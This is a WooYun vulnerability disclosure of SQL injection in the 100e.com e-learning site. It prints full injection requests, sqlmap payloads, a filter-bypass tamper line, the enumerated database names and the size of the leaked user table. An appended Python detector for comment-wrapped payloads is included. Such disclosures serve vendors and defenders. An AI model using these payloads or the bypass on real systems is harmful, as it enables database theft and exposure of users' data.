
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-093134

Title: Multiple SQL injections in 100e (一百易) leak a large amount of user information

Vendor: 100e.com

Author: 路人甲

Submitted: 2015-01-22 11:02

Fixed: 2015-03-08 11:04

Published: 2015-03-08 11:04

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-01-22: Details sent to the vendor, awaiting vendor handling
2015-01-23: Vendor confirmed; details disclosed to the vendor only
2015-02-02: Details disclosed to core white hats and experts in the relevant field
2015-02-12: Details disclosed to regular white hats
2015-02-22: Details disclosed to intern white hats
2015-03-08: Details disclosed to the public

Brief description:

233

Detailed description:

http://elearning.100e.com/lvword/AddToMyLib.asp?LetterLevel=0&PageNo=6&WordLevel=

[Screenshot: 1e1.jpg]

[Screenshot: 1e2.jpg]


Two POST-type injection points:
POST /lvword/ApplyAdd.asp HTTP/1.1
Content-Length: 182
Content-Type: application/x-www-form-urlencoded
Referer: http://elearning.100e.com/
Cookie: ASPSESSIONIDCARRTSAD=CCNPACLCANHADHOLLBHMDLCG
Host: elearning.100e.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Slct_WordID=%5c&Slct_WordID=1038&Slct_WordID=1923&Slct_WordID=1739&Slct_WordID=1738&Slct_WordID=1690&Slct_WordID=2043&Slct_WordID=1679&Slct_WordID=1619&Slct_WordID=999&User=100eGuest
-------------
POST /lvWord/ApplyDel.asp HTTP/1.1
Content-Length: 25
Content-Type: application/x-www-form-urlencoded
Referer: http://elearning.100e.com/
Cookie: ASPSESSIONIDCARRTSAD=CCNPACLCANHADHOLLBHMDLCG
Host: elearning.100e.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Delete=%5c&user=100eGuest

Proof of vulnerability:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: WordLevel
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: LetterLevel=0&PageNo=6&WordLevel=-9134' OR (1585=1585)#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: LetterLevel=0&PageNo=6&WordLevel=' AND (SELECT 4947 FROM(SELECT COUNT(*),CONCAT(0x7165746571,(SELECT (CASE WHEN (4947=4947) THEN 1 ELSE 0 END)),0x71787a6d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ZeHm'='ZeHm
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: LetterLevel=0&PageNo=6&WordLevel=' UNION ALL SELECT NULL,CONCAT(0x7165746571,0x41765065585877547578,0x71787a6d71),NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: LetterLevel=0&PageNo=6&WordLevel=' AND 7649=BENCHMARK(5000000,MD5(0x77536462)) AND 'dqTB'='dqTB
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: MySQL 5.0
available databases [26]:
[*] 100eDB
[*] 100eDB2
[*] 100eZone
[*] Admin
[*] AppendDB
[*] Book
[*] Chat7
[*] Chat7_Log
[*] Client
[*] ClientLog
[*] Course
[*] Edu
[*] FileService
[*] Group
[*] information_schema
[*] IPLocation
[*] mysql
[*] School
[*] Tag
[*] TEC
[*] TemporaryDB
[*] test
[*] User
[*] VC2008
[*] VC6
[*] VC7
----------------
The leaked information includes users, franchise users, and third-party information.
Look at mymember:
select count(*) from mymember: '262 6446', i.e. 2.62 million user records.
Dumping the other tables worked normally; only when dumping the mymember table did the connection get refused.
There is clearly a check before data goes into the database, but...
payload= "%s /*!30%s%s*/%s" % (payload[:payload.find(' ')], randomInt(3), payload[payload.find(' ') + 1:], postfix)
Bypassed successfully...
After getting admin access, I found that the administrators' privileges all differ.
Here is a screenshot:

[Screenshot: 100e1.jpg]
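The tamper line quoted above wraps the payload in a MySQL version comment (`/*!30NNN ... */`), which MySQL still executes while a filter that inspects the raw value sees only a comment or a keyword glued to digits. The following is an added detection example (not code from the report or from 100e.com) that unwraps such comments before pattern matching; the query strings, the `30874` version number and the two patterns are constructed for the demonstration.

```python
import re
from urllib.parse import parse_qs

# Two injection shapes taken from the report's sqlmap output, matched the way a naive
# pre-insertion filter would: on the value as received. The \b anchors are what the
# version-comment wrapper defeats, because "/*!30874UNION" glues digits to the keyword.
INJECTION_PATTERNS = [
    re.compile(r"\bunion\b\s+(all\s+)?\bselect\b", re.I),
    re.compile(r"\b(and|or)\b\s+\d+\s*=\s*(\d+|benchmark\s*\()", re.I),
]

# MySQL executes the body of /*!NNNNN ... */ whenever its version is >= NNNNN
# (always, when no number is given), so the body has to be inspected as live SQL.
VERSION_COMMENT_RE = re.compile(r"/\*!\d{0,5}(.*?)\*/", re.S)
PLAIN_COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)


def normalize(value):
    """Unwrap executable version comments, drop ordinary comments, collapse whitespace."""
    text = VERSION_COMMENT_RE.sub(lambda m: " " + m.group(1) + " ", value)
    text = PLAIN_COMMENT_RE.sub(" ", text)
    return re.sub(r"\s+", " ", text).strip()


def looks_injected(value, normalize_first=True):
    probe = normalize(value) if normalize_first else value
    return any(p.search(probe) for p in INJECTION_PATTERNS)


def scan_query_strings(query_strings, normalize_first=True):
    """For each query string, return the sorted names of the parameters that were flagged."""
    results = []
    for qs in query_strings:
        params = parse_qs(qs, keep_blank_values=True)
        results.append(sorted(name for name, values in params.items()
                              if any(looks_injected(v, normalize_first) for v in values)))
    return results


# Constructed samples modelled on the report's AddToMyLib.asp parameters, shown
# URL-decoded for readability: a benign request, the plain UNION payload, and two
# payloads wrapped the way the quoted tamper line does it.
SAMPLE_QUERY_STRINGS = [
    "LetterLevel=0&PageNo=6&WordLevel=",
    "LetterLevel=0&PageNo=6&WordLevel=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#",
    "LetterLevel=0&PageNo=6&WordLevel=' /*!30874UNION ALL SELECT NULL,NULL,NULL,NULL,NULL*/#",
    "LetterLevel=0&PageNo=6&WordLevel=' /*!30874AND 7649=BENCHMARK(5000000,MD5(0x77536462))*/ AND 'a'='a",
]

if __name__ == "__main__":
    print("raw:        ", scan_query_strings(SAMPLE_QUERY_STRINGS, normalize_first=False))
    print("normalized: ", scan_query_strings(SAMPLE_QUERY_STRINGS, normalize_first=True))
```

The raw scan flags only the second sample, the normalized scan flags samples two to four; such a filter is a detection aid, and the actual fix for the pages listed above is parameterized queries.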

Fix recommendation:

1. Recommend auditing the whole site; there are quite a few problems.
2. Asking for 20 rank!!!

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed at: 2015-01-23 10:07

Vendor reply:

Thanks, we will fix it right away.

Latest status:

2015-01-23: Fixed

